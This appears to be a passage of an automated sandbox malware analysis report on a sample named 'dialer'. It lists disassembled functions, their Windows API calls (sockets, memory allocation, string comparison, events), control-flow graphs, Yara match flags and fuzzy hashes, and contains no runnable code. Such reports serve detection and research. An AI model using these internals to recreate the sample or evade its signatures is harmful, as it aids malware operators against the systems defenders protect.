                                                                                      • Opcode Fuzzy Hash: 40455434e0ec4754dbb3a1779fb2bd6ee4852f256e5686d92bed9765dfbaccb3
                                                                                      • Instruction Fuzzy Hash: 05413A70694B018FEB358E65C544FA6B7EFFB01365F044A1DE89296AA0D730EC46CF40
                                                                                      Function 0594A983 Relevance: 3.1, APIs: 2, Instructions: 86networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 216 594a983-594a98f 217 594a991-594a996 216->217 218 594a9ab-594a9c4 216->218 217->218 219 594a998-594a99a 217->219 220 594a9c6-594a9df setsockopt 218->220 221 594aa1a-594aa30 call 594afca call 594ac0f 218->221 219->218 223 594a99c-594a9a3 219->223 224 594a9e1-594a9fd call 5949ecb 220->224 225 594a9ff-594aa18 WSAGetLastError call 594ac0f 220->225 236 594aa33-594aa3e 221->236 223->218 228 594a9a5-594a9a8 223->228 224->236 225->236 228->218 238 594aa56-594aa5a 236->238 239 594aa40-594aa42 236->239 239->238 240 594aa44-594aa46 239->240 240->238 241 594aa48-594aa53 240->241 241->238
                                                                                      APIs
                                                                                      • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 0594A9D7
                                                                                      • WSAGetLastError.WS2_32(?,05948D2F,00000000,00000000,?,00000000,00000000,00000000,05948BB0,00000000,?,00000000,05942CE1,?,00000000,?), ref: 0594A9FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastsetsockopt
                                                                                      • String ID:
                                                                                      • API String ID: 1729277954-0
                                                                                      • Opcode ID: b780ec6b5c8d052eeb8f1a9fd8505952942680403d68fbf312a499e9175a67bf
                                                                                      • Instruction ID: 6ea378f058572525c0cc4f64ba22c32ad26199fab38b8a115259974958ff77c5
                                                                                      • Opcode Fuzzy Hash: b780ec6b5c8d052eeb8f1a9fd8505952942680403d68fbf312a499e9175a67bf
                                                                                      • Instruction Fuzzy Hash: D7316B70248701AFDB20DF25C984E6AB7BAFF49364B048619FC5A97681C730FC118FA4
                                                                                      Function 032B00A0 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032B00C9
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032B0275
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000003.2576468383.00000000032B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_3_32b0000_dialer.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocFree
                                                                                      • String ID:
                                                                                      • API String ID: 2087232378-0
                                                                                      • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                      • Instruction ID: 3a1b7360a53d53a6a31af5b58a434d78c18e66af299ab4f928fed63124037965
                                                                                      • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                      • Instruction Fuzzy Hash: B5718D71D2424A9FDB42CF98C981BEEBBF0AB09354F188095E4A5F7241C374AA95CF64
                                                                                      Function 0594F03C Relevance: 2.6, APIs: 2, Instructions: 82stringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 242 594f03c-594f043 243 594f118-594f119 242->243 244 594f049-594f065 242->244 245 594f075-594f07a 244->245 246 594f067-594f072 call 5952762 244->246 247 594f07c-594f088 call 5952762 free 245->247 248 594f08b-594f090 245->248 246->245 247->248 251 594f092-594f09e call 594ef4e 248->251 252 594f09f-594f0a3 248->252 251->252 256 594f0a5-594f0ca call 594ef8e call 594ef4e call 594f002 252->256 257 594f0cd-594f0d2 252->257 256->257 259 594f0d4-594f0e0 call 594f002 257->259 260 594f0e1-594f0e9 257->260 259->260 265 594f108-594f117 call 5952762 260->265 266 594f0eb-594f105 strlen call 5952762 260->266 265->243 266->265
                                                                                      APIs
                                                                                      • free.MSVCRT(74C08559,74C08559,0000414D,00000000,?,00000000,05944237,05944300,05944237,00000000,0594429A,?,00000000,05944237,00000000,05944361), ref: 0594F086
                                                                                      • strlen.MSVCRT ref: 0594F0EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: freestrlen
                                                                                      • String ID:
                                                                                      • API String ID: 322734593-0
                                                                                      • Opcode ID: 27a049ef2d069cbdb3e8afd81a67b79dcaab8a1337f5346a11ddf271edd31fda
                                                                                      • Instruction ID: d483f3b060e3b6767c250b15a7a0c3db7972bfe60c117b6812d4dea5c0987237
                                                                                      • Opcode Fuzzy Hash: 27a049ef2d069cbdb3e8afd81a67b79dcaab8a1337f5346a11ddf271edd31fda
                                                                                      • Instruction Fuzzy Hash: 1F214C31208705ABDB31BB39EE45E5B77EDFF80714B454829E486A2A60DB22FC109E21
                                                                                      Function 059446ED Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • malloc.MSVCRT ref: 059446F4
                                                                                      • memset.MSVCRT ref: 0594470A
                                                                                        • Part of subcall function 0594E798: memset.MSVCRT ref: 0594E7A3
                                                                                        • Part of subcall function 0594E7AC: calloc.MSVCRT(00000001,0000414D), ref: 0594E7CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: memset$callocmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 4186080596-0
                                                                                      • Opcode ID: 8d50d8e45384942101eea42b97ccc52974917b57355fedc4a57159ef11ade8ec
                                                                                      • Instruction ID: d4e4ab89faacc4fb20080d0b3cdc0d01fefecb7e0db86a27a44a6168f5aab64e
                                                                                      • Opcode Fuzzy Hash: 8d50d8e45384942101eea42b97ccc52974917b57355fedc4a57159ef11ade8ec
                                                                                      • Instruction Fuzzy Hash: B2F04F75740700ABD620AB65CD4AF4B7BA9EFC6B20F044819F559A7640C634BC00CB51
                                                                                      Function 05949EF3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 293 5949ef3-5949f1e 294 5949f20-5949f23 293->294 295 5949f33-5949f3b 293->295 294->295 296 5949f25-5949f2e 294->296 297 5949f3d-5949f42 295->297 298 5949f5f-5949f63 295->298 296->295 299 5949f30 296->299 300 5949f44-5949f47 297->300 301 5949f56-5949f58 call 5949f64 297->301 299->295 300->301 302 5949f49-5949f53 CreateEventA 300->302 304 5949f5d-5949f5e 301->304 302->301 304->298
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,059421B5,?,05949762,?,059421B5,059421B5,05944579,?,059445AE,059445FA,0594454F,?), ref: 05949F4D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateEvent
                                                                                      • String ID:
                                                                                      • API String ID: 2692171526-0
                                                                                      • Opcode ID: afb071d9cc0ddb40b3cb5af852ec3cf6033474137f99890ffed26238c12420d2
                                                                                      • Instruction ID: b11f0871276678df336ca9bad2a0096aaf2998a89505a54f5fa481d41f73f1c5
                                                                                      • Opcode Fuzzy Hash: afb071d9cc0ddb40b3cb5af852ec3cf6033474137f99890ffed26238c12420d2
                                                                                      • Instruction Fuzzy Hash: AF01E575908701AFE734CE26D440E63B7F9FB88760F04895EE88A86641E774FC458F50
                                                                                      Function 0594E7AC Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 305 594e7ac-594e7d8 calloc 306 594e7ef-594e7f6 305->306 307 594e7da-594e7ed 305->307 308 594e80d-594e85d 306->308 307->306 311 594e7f8-594e80b call 594ea13 call 594e866 307->311 315 594e861-594e865 308->315 311->308 318 594e85f 311->318 318->315
                                                                                      APIs
                                                                                      • calloc.MSVCRT(00000001,0000414D), ref: 0594E7CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: calloc
                                                                                      • String ID:
                                                                                      • API String ID: 2635317215-0
                                                                                      • Opcode ID: 49a46611532a12e163cc302d1987c13a93e53c572513acb75163985642f573e8
                                                                                      • Instruction ID: 784de1f2f33d96771279c574dbdee5e81e89779724a6e4fbb24077656e4d1402
                                                                                      • Opcode Fuzzy Hash: 49a46611532a12e163cc302d1987c13a93e53c572513acb75163985642f573e8
                                                                                      • Instruction Fuzzy Hash: BB21EAB1604740DED7208F2AE881A86FBE8FF94754F20481FE199D7361DBB0A440CF65
                                                                                      Function 05941BD9 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 319 5941bd9-5941be7 malloc 320 5941c00-5941c05 319->320 321 5941be9-5941bfd 319->321 322 5941c07 320->322 323 5941c09-5941c16 call 5941c20 320->323 321->320 322->323 325 5941c1b-5941c1f 323->325
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: malloc
                                                                                      • String ID:
                                                                                      • API String ID: 2803490479-0
                                                                                      • Opcode ID: 56ec6e8d49c7ae978114d4b548f05e03b15f1dc0a3751283c51efb61cbf357b3
                                                                                      • Instruction ID: 4bb6fba55bbac8fd5a35a8208ea03c3fed6f773ae3bb1a2bfffdb5f0a301e135
                                                                                      • Opcode Fuzzy Hash: 56ec6e8d49c7ae978114d4b548f05e03b15f1dc0a3751283c51efb61cbf357b3
                                                                                      • Instruction Fuzzy Hash: 95F0DAB56042099FCF098F94E854DA93FA5FF48355B05406DFD094B361D731D860DF50

                                                                                      Non-executed Functions

                                                                                      Function 032B027F Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000003.2576468383.00000000032B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_3_32b0000_dialer.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                      • Instruction ID: 1e772ff178c8c2ec78f6c8e5b879ae8f7a2d474edd64490de52ee48c86650617
                                                                                      • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                      • Instruction Fuzzy Hash: 73F0C279A21201CFCB25CF09C944CD6B7F5FB80790B288095E4049B260D3B0DDC8C750
                                                                                      Function 05944AB5 Relevance: 31.6, APIs: 25, Instructions: 300COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,0596DEBC,00000001,00000000,?,0594328A,?,?), ref: 05944AE4
                                                                                      • memcmp.MSVCRT(?,0596DEB8,00000002), ref: 05944B13
                                                                                      • memcmp.MSVCRT(?,0596DEB4,00000003), ref: 05944B53
                                                                                      • memcmp.MSVCRT(?,0596DEA0,00000004), ref: 05944BE8
                                                                                      • memcmp.MSVCRT(?,0596DE98,00000005), ref: 05944C2C
                                                                                      • memcmp.MSVCRT(?,0596DE70,00000006), ref: 05944CEA
                                                                                      • memcmp.MSVCRT(?,0596DE58,00000007), ref: 05944D66
                                                                                      • memcmp.MSVCRT(?,0596DE3C,00000008), ref: 05944DE4
                                                                                      • memcmp.MSVCRT(?,0596DE18,00000009), ref: 05944E60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1475443563-0
                                                                                      • Opcode ID: e1da9cb2bd1a3164abd2e578960156635ef5ef81dee48c5d630cd36691c39531
                                                                                      • Instruction ID: 7540a50af7c7a6d1d92b065ff9d20c68bb27b430663bd77ccaf7810230b1b5b7
                                                                                      • Opcode Fuzzy Hash: e1da9cb2bd1a3164abd2e578960156635ef5ef81dee48c5d630cd36691c39531
                                                                                      • Instruction Fuzzy Hash: 9D81E3B2B4830073D92151FB4D4BF362B8E6B5294BF866811FD19AD18EF175ED0C9E82
                                                                                      Function 05949CA2 Relevance: 16.7, APIs: 11, Instructions: 168networkregistryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • socket.WS2_32(0000138A,00000001,00000000), ref: 05949CCC
                                                                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,0594A95A,?,00000000,?,00000000,00000000,?,00000000), ref: 05949D09
                                                                                      • closesocket.WS2_32(00000000), ref: 05949D44
                                                                                      • memset.MSVCRT ref: 05949D5A
                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,?), ref: 05949DBB
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 05949DC8
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 05949DD2
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 05949DDA
                                                                                      • closesocket.WS2_32(?), ref: 05949DFE
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 05949E0C
                                                                                      • RegisterWaitForSingleObject.KERNEL32(00000154,?,05949EAD,00000000,000000FF,00000004), ref: 05949E49
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Handleclosesocket$CloseInformationObjectRegisterSingleWaitmemsetsocket
                                                                                      • String ID:
                                                                                      • API String ID: 1241441197-0
                                                                                      • Opcode ID: 20263af33024230541f2b55e8bfd3ef743fb5fc16bd243bbd6fd0869f99b6781
                                                                                      • Instruction ID: b06edc1f9b61e6a06d422c16d3fb2a0179a2112cc998a77be1cf5852417c67c1
                                                                                      • Opcode Fuzzy Hash: 20263af33024230541f2b55e8bfd3ef743fb5fc16bd243bbd6fd0869f99b6781
                                                                                      • Instruction Fuzzy Hash: F251BA72214A06EFD7209FA0DC4AFAB7BB9FF45311F208629F416D6180DB75E9058FA0
                                                                                      Function 05942E70 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 263stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetUserDefaultLangID.KERNEL32(00000059,00000000,00000020), ref: 05942EEA
                                                                                      • GetUserDefaultLangID.KERNEL32(0000005A,00000000,00000020), ref: 05942F12
                                                                                      • _snwprintf.MSVCRT ref: 05942FB0
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 05942FCA
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000080,00000000,00000000), ref: 05942FF8
                                                                                      • strlen.MSVCRT ref: 05943143
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharDefaultLangMultiUserWide$_snwprintfstrlen
                                                                                      • String ID: z
                                                                                      • API String ID: 2883371422-1657960367
                                                                                      • Opcode ID: 55dcf21ff6f96276199610c12472d8ec7c21c7ebd29e8528564921a44b8e73f9
                                                                                      • Instruction ID: 9cef7126396df2dba4aaf5f7368c73518ee84bd61f69a9d3e46c16ec37ffc27d
                                                                                      • Opcode Fuzzy Hash: 55dcf21ff6f96276199610c12472d8ec7c21c7ebd29e8528564921a44b8e73f9
                                                                                      • Instruction Fuzzy Hash: 12A151B5A04308AFDB10DFA4DD89E6A7BFCFB45344F148819F515AB280DB74A9498F21
                                                                                      Function 0594984B Relevance: 12.2, APIs: 8, Instructions: 170networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • shutdown.WS2_32(?,00000001), ref: 059498C7
                                                                                      • WSAGetLastError.WS2_32(?,00000000,?,05948C46,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05948BB6,00000000,00000000,?,00000000), ref: 059498D8
                                                                                      • closesocket.WS2_32(?), ref: 0594994E
                                                                                      • UnregisterWait.KERNEL32(89595908), ref: 05949993
                                                                                      • CloseHandle.KERNEL32(458BF845,00000000,00000000,?,00000000,?,05948C46,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05948BB6,00000000), ref: 059499AD
                                                                                      • free.MSVCRT ref: 059499D3
                                                                                      • UnregisterWait.KERNEL32(?), ref: 059499F4
                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,05948C46,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05948BB6,00000000), ref: 05949A06
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleUnregisterWait$ErrorLastclosesocketfreeshutdown
                                                                                      • String ID:
                                                                                      • API String ID: 3261266694-0
                                                                                      • Opcode ID: 3b7f0a4bdf0dcd38874e259c93679dae6c4e902ebb69187ef0cc98f154400c83
                                                                                      • Instruction ID: 6b21d35e9e77513d525229314c7ec8c26b056a15e6bd0a724a020b6ea512615b
                                                                                      • Opcode Fuzzy Hash: 3b7f0a4bdf0dcd38874e259c93679dae6c4e902ebb69187ef0cc98f154400c83
                                                                                      • Instruction Fuzzy Hash: EC511271608B018FDB34CF69C484E67B7E9BF45325F144A2EE996976A0D730E849CF50
                                                                                      Function 05942B8F Relevance: 12.1, APIs: 8, Instructions: 140stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: callocfree$memsetsrandstrlentime
                                                                                      • String ID:
                                                                                      • API String ID: 805530809-0
                                                                                      • Opcode ID: 6139fd1f637154d92d1025241fd5992e7ab3e291d9f2ee12b6f7c8e05ee7337a
                                                                                      • Instruction ID: eaa7a32a51092af453878da89e257eaf120818f59004c45886a37af37cad23f9
                                                                                      • Opcode Fuzzy Hash: 6139fd1f637154d92d1025241fd5992e7ab3e291d9f2ee12b6f7c8e05ee7337a
                                                                                      • Instruction Fuzzy Hash: A35109B5900705AFDB10DFA5C889EAEBBF8FF08304F50892EF95AA7640D775A9448F50
                                                                                      Function 0594BCF1 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$memset
                                                                                      • String ID:
                                                                                      • API String ID: 4054172246-0
                                                                                      • Opcode ID: c93810a15b7ed7f9d8aea7e854e53a4a5ea0003bf9aeb80a3086981a12fbebca
                                                                                      • Instruction ID: 79194cac09044eab00097b3e8642d384195c096b9703b22e7b77304b37e84dec
                                                                                      • Opcode Fuzzy Hash: c93810a15b7ed7f9d8aea7e854e53a4a5ea0003bf9aeb80a3086981a12fbebca
                                                                                      • Instruction Fuzzy Hash: C3514772504A04AFDB21DF65D849F9BBBFDFF44310F108A29E546E6140DB74EA098FA0
                                                                                      Function 0594B2A0 Relevance: 10.6, APIs: 7, Instructions: 83networksynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0594BB80,?,000000FF,00000000,00000000), ref: 0594B2C7
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,0594BB80), ref: 0594B308
                                                                                      • GetLastError.KERNEL32(?,?,?,0594BB80), ref: 0594B313
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,0594BB80), ref: 0594B31C
                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,0594BB80), ref: 0594B323
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,0594BB80), ref: 0594B332
                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,0594BB80), ref: 0594B355
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CloseHandle$CreateEventObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1659421480-0
                                                                                      • Opcode ID: 6962848994f15dea19525998692750550623304e0cc010d94d7ab828857b802b
                                                                                      • Instruction ID: 2ede505663d4150066fbf25921f18387cdd7d16dc768fcb554e91e0feecb334b
                                                                                      • Opcode Fuzzy Hash: 6962848994f15dea19525998692750550623304e0cc010d94d7ab828857b802b
                                                                                      • Instruction Fuzzy Hash: 8621CF32519225EBDB215A6A9C49EAF3F6EFB457B0F140714F926F31C0DB30CC448AA0
                                                                                      Function 05944F5A Relevance: 8.8, APIs: 7, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,0596DDC0,0000000C), ref: 05944F94
                                                                                      • memcmp.MSVCRT(?,0596DDB0,0000000C), ref: 05944FB6
                                                                                      • memcmp.MSVCRT(?,0596DDA0,0000000C), ref: 05944FD8
                                                                                      • memcmp.MSVCRT(?,0596DD80,0000000C), ref: 05945018
                                                                                      • memcmp.MSVCRT(?,0596DD70,0000000C), ref: 0594503A
                                                                                      • memcmp.MSVCRT(?,0596DD60,0000000C), ref: 0594505C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1475443563-0
                                                                                      • Opcode ID: 851b1472a53943425e5f21e7396104759b40a3c623d2216dfba508fc05a9e4a2
                                                                                      • Instruction ID: 690a4299cd57b766dbc511e4c028679874beae6e184e0f06f7114b47faac4264
                                                                                      • Opcode Fuzzy Hash: 851b1472a53943425e5f21e7396104759b40a3c623d2216dfba508fc05a9e4a2
                                                                                      • Instruction Fuzzy Hash: 53110EB274835163E42031F71D17F3A2B4D9B42A8AF865520FD19EC88AF255EE0C9A87
                                                                                      Function 059434E5 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 377COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: memcmp$callocfree
                                                                                      • String ID: factfmt RIFFdata
                                                                                      • API String ID: 254810267-2461439165
                                                                                      • Opcode ID: fb967490744d3ead6750449d6f91fb8b6903474a1e4bd49fb8e98b1cdfb788c1
                                                                                      • Instruction ID: 463130a74c83694a02027814047767a68fcfb2cff43ba6a1e9321c45f7563a4e
                                                                                      • Opcode Fuzzy Hash: fb967490744d3ead6750449d6f91fb8b6903474a1e4bd49fb8e98b1cdfb788c1
                                                                                      • Instruction Fuzzy Hash: EBD19F72E042599BDF24DFA4C884FEEB7BDBF45710F04845AE545A7240E734AA88CF64
                                                                                      Function 059551E4 Relevance: 7.8, APIs: 6, Instructions: 347COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: memset$calloc
                                                                                      • String ID:
                                                                                      • API String ID: 1504270956-0
                                                                                      • Opcode ID: 555e4bd3af3030c12d728cbb9090f6e7f22db2d3905f112967fad4ce496341ed
                                                                                      • Instruction ID: 16c0842c0f31d4e291d0eb8b23146a12ce069755f3c1426d21e4d194c16e7c45
                                                                                      • Opcode Fuzzy Hash: 555e4bd3af3030c12d728cbb9090f6e7f22db2d3905f112967fad4ce496341ed
                                                                                      • Instruction Fuzzy Hash: FDC16DB2A00209EBDB11DAA4D984EEF77FDFF44260F55056AED06D7201F630EA15CBA0
                                                                                      Function 0594C5F6 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 158stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: strchr$memset
                                                                                      • String ID: 0123456789ABCDEF$0123456789abcdef
                                                                                      • API String ID: 3020236661-885041942
                                                                                      • Opcode ID: e4c23b4a9594f77f3466080fb522d0189346505b0538def2732c778f8bbe60e7
                                                                                      • Instruction ID: 86259b27d4cb7ea3bf5ee6082ace63104da7a9da82cec740e2051dc34dab872d
                                                                                      • Opcode Fuzzy Hash: e4c23b4a9594f77f3466080fb522d0189346505b0538def2732c778f8bbe60e7
                                                                                      • Instruction Fuzzy Hash: 0451903190524ADFCF25CFA8C495DEEBFB9FB85264F14806AD842A7250E7709E85CF90
                                                                                      Function 05948E11 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,05948E0E,00000000,0594BB73,0594BBBA,0596EEE0,0594BBC2,0594BB73,00000000), ref: 05948E1E
                                                                                      • InterlockedCompareExchange.KERNEL32(0594BB77,00000000,00000000), ref: 05948E30
                                                                                      • SetEvent.KERNEL32(00000000,?,05948E0E,00000000,0594BB73,0594BBBA,0596EEE0,0594BBC2,0594BB73,00000000), ref: 05948E41
